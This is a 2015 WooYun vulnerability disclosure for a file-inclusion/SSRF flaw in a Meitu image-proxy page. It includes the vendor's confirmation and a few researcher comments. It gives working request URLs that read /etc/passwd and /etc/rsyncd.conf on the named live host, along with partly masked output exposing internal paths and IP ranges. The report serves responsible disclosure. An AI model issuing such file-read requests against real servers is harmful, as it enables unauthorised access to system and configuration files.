当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0106865

漏洞标题:美图秀秀某站任意文件包含漏洞

相关厂商:美图秀秀

漏洞作者: J4rn4ben

提交时间:2015-04-09 16:35

修复时间:2015-05-24 16:46

公开时间:2015-05-24 16:46

漏洞类型:文件包含

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-04-09: 细节已通知厂商并且等待厂商处理中
2015-04-09: 厂商已经确认,细节仅向厂商公开
2015-04-19: 细节向核心白帽子及相关领域专家公开
2015-04-29: 细节向普通白帽子公开
2015-05-09: 细节向实习白帽子公开
2015-05-24: 细节向公众公开

简要描述:

美图秀秀的某个url在加载图片地址的时候没有判断好url来源,可以ssrf攻击内网或者读取本地的任意文件

详细说明:

http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd

mask 区域
*****/sbin/nologin saslauth:x:499:76:"Saslauthd user":/var/empty/saslauth:/sbin/nologin postfix:x:89:89::/var/spool/postfix:/sbin/nologin sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin dbus:x:81:81:System message bus:/:/sbin/nologin abrt:x:173:173::/etc/abrt:/sbin/nologin ntp:x:38:38::/etc/ntp:/sbin/nologin hald*****


所有的web路径都有了:
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf

mask 区域
*****ww_pomelo_com] path = /www/web/www.pomelo.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [duoduo_meitu_com] path = /www/web/kankan.web.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [corp_meitu_com] path = /www/web/corp.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [www_52hxw_com] path = /www/web/www.52hxw.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [all_meitu_com] path = /www/web/all.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [xiuxiu_mobile_meitudata_com] path = /www/web/xiuxiu.mobile.meitudata.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [wx_upload_meitu_com] path = /www/web/wx.upload.meitu.com/ read only = no hosts allow = 172.17.16.0/24 [expression_meitu_com] path = /www/web/expression.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [xiuxiu_web_meitu_com] path = /www/web/xiuxiu.web.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [guanjia_meitu_com] path = /www/web/guanjia.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [www_posterlabs_cn] path = /www/web/www.posterlabs.cn/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/29 222.76.241.146/29 [en_meitu_com] path = /www/web/en.meitu.com/ read only = no hosts allow = 172.17.16.0/24 222.76.241.154/2*****

漏洞证明:

http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/passwd
http://xiuxiu.web.meitu.com/plat/pic_proxy.php?url=/etc/rsyncd.conf

修复方案:

参数严格判断

版权声明:转载请注明来源 J4rn4ben@乌云


漏洞回应

厂商回应:

危害等级:低

漏洞Rank:5

确认时间:2015-04-09 16:44

厂商回复:

谢谢白帽子的提醒!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-05-24 20:19 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    哥们你是先遍历URL然后加payload么,还是用工具?

  2. 2015-05-25 07:28 | J4rn4ben ( 路人 | Rank:15 漏洞数:4 | 喜欢在西湖里自由泳的野猪)

    @Me_Fortune 手动测的,看哪些url比较可疑测测就行

  3. 2015-05-25 08:22 | Me_Fortune ( 普通白帽子 | Rank:209 漏洞数:71 | I'm Me_Fortune)

    @J4rn4ben 射射!